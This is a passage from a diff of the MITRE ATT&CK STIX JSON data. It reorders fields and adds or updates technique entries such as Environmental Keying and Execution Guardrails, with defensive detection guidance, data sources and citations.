+ "x_mitre_contributors": [
+ "Jimmy Astle, @AstleJimmy, Carbon Black",
+ "Erika Noerenberg, @gutterchurl, Carbon Black"
],
- "x_mitre_effective_permissions": [
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -8882,20 +9236,20 @@
],
"modified": "2020-03-26T15:27:58.933Z",
"created": "2020-02-21T21:08:33.237Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Office 365 account logs",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
]
},
{
@@ -8927,7 +9281,18 @@
],
"modified": "2020-03-24T18:31:06.417Z",
"created": "2017-05-31T21:31:25.454Z",
- "x_mitre_version": "2.1",
+ "x_mitre_contributors": [
+ "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ],
+ "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. 
However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
"x_mitre_data_sources": [
"Office 365 trace logs",
"Mail server",
@@ -8937,18 +9302,7 @@
"Process monitoring",
"Process use of network"
],
- "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. 
However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_contributors": [
- "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
- ]
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -8984,10 +9338,15 @@
],
"modified": "2020-03-24T18:29:48.994Z",
"created": "2020-02-19T18:54:47.103Z",
- "x_mitre_platforms": [
- "Office 365",
- "Windows"
+ "x_mitre_contributors": [
+ "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
"x_mitre_data_sources": [
"Process use of network",
"Process monitoring",
@@ -8995,14 +9354,9 @@
"Mail server",
"Office 365 trace logs"
],
- "x_mitre_detection": "Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
+ "x_mitre_platforms": [
+ "Office 365",
+ "Windows"
]
},
{
@@ -9078,30 +9432,32 @@
],
"modified": "2020-03-24T21:37:25.307Z",
"created": "2020-01-24T15:15:13.426Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.",
+ "x_mitre_data_sources": [
+ "File monitoring"
],
"x_mitre_contributors": [
"Ivan Sinyakov"
],
- "x_mitre_data_sources": [
- "File monitoring"
- ],
- "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
- "id": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
- "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
- "name": "Encrypted Channel",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-03-16T15:33:01.739Z",
+ "modified": "2020-03-30T00:37:16.809Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -9124,15 +9480,13 @@
"source_name": "University of Birmingham C2"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-30T00:37:16.809Z",
- "created": "2020-03-16T15:33:01.739Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Encrypted Channel",
+ "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
+ "id": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": false,
"x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
@@ -9224,19 +9578,8 @@
],
"modified": "2020-03-29T02:07:27.676Z",
"created": "2019-04-18T11:00:55.862Z",
- "x_mitre_data_sources": [
- "SSL/TLS inspection",
- "Web logs",
- "Web application firewall logs",
- "Network intrusion detection system",
- "Network protocol analysis",
- "Network device logs",
- "Netflow/Enclave netflow"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_impact_type": [
- "Availability"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -9248,8 +9591,102 @@
"Azure AD",
"SaaS"
],
- "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
- "x_mitre_is_subtechnique": false
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_data_sources": [
+ "SSL/TLS inspection",
+ "Web logs",
+ "Web application firewall logs",
+ "Network intrusion detection system",
+ "Network protocol analysis",
+ "Network device logs",
+ "Netflow/Enclave netflow"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1480.001",
+ "url": "https://attack.mitre.org/techniques/T1480/001"
+ },
+ {
+ "source_name": "EK Clueless Agents",
+ "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf",
+ "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019."
+ },
+ {
+ "source_name": "Kaspersky Gauss Whitepaper",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf",
+ "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Proofpoint Router Malvertising",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices",
+ "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019."
+ },
+ {
+ "source_name": "EK Impeding Malware Analysis",
+ "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf",
+ "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019."
+ },
+ {
+ "source_name": "Environmental Keyed HTA",
+ "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/",
+ "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019."
+ },
+ {
+ "source_name": "Ebowla: Genetic Malware",
+ "url": "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf",
+ "description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019."
+ },
+ {
+ "source_name": "Demiguise Guardrail Router Logo",
+ "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js",
+ "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Environmental Keying",
+ "description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. 
Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
+ "id": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-24T18:52:12.719Z",
+ "created": "2020-06-23T22:28:28.041Z",
+ "x_mitre_contributors": [
+ "Nick Carr, FireEye"
+ ],
+ "x_mitre_detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
+ "x_mitre_data_sources": [
+ "Process monitoring"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host forensic analysis",
+ "Signature-based detection",
+ "Static file analysis"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9277,13 +9714,11 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T21:37:25.477Z",
+ "modified": "2020-07-09T13:55:51.501Z",
"created": "2020-01-22T21:04:23.285Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ",
"x_mitre_data_sources": [
"API monitoring",
"Windows event logs",
@@ -9298,9 +9733,11 @@
"DLL monitoring",
"Windows Registry"
],
- "x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9344,24 +9781,24 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-23T19:49:17.544Z",
+ "modified": "2020-05-04T19:18:36.254Z",
"created": "2020-01-19T16:54:28.516Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
"x_mitre_contributors": [
- "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)"
+ "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"
],
- "x_mitre_data_sources": [
- "Office 365 audit logs"
- ],
- "x_mitre_detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
+ "x_mitre_data_sources": [
+ "Office 365 audit logs"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -9405,35 +9842,35 @@
],
"modified": "2020-03-26T19:20:23.030Z",
"created": "2020-03-13T11:12:18.558Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire",
- "Stefan Kanthak"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "File monitoring"
- ],
- "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.",
"x_mitre_effective_permissions": [
"Administrator",
"User",
"SYSTEM"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "File monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire",
+ "Stefan Kanthak"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
{
- "external_id": "T1480",
"source_name": "mitre-attack",
+ "external_id": "T1480",
"url": "https://attack.mitre.org/techniques/T1480"
},
{
@@ -9442,39 +9879,9 @@
"description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019."
},
{
- "source_name": "EK Clueless Agents",
- "url": "https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf",
- "description": "Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019."
- },
- {
- "source_name": "Kaspersky Gauss Whitepaper",
- "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf",
- "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019."
- },
- {
- "source_name": "Proofpoint Router Malvertising",
- "url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices",
- "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019."
- },
- {
- "source_name": "EK Impeding Malware Analysis",
- "url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf",
- "description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019."
- },
- {
- "source_name": "Environmental Keyed HTA",
- "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/",
- "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019."
- },
- {
- "source_name": "Ebowla: Genetic Malware",
- "url": "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf",
- "description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019."
- },
- {
- "source_name": "Demiguise Guardrail Router Logo",
- "url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js",
- "description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019."
+ "source_name": "FireEye Outlook Dec 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html",
+ "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020."
}
],
"object_marking_refs": [
@@ -9482,7 +9889,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Execution Guardrails",
- "description": "Execution guardrails constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. \n\nGuardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.\n\nEnvironmental keying is one type of guardrail that includes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use guardrails and environmental keying to help protect their TTPs and evade detection. 
For example, environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.",
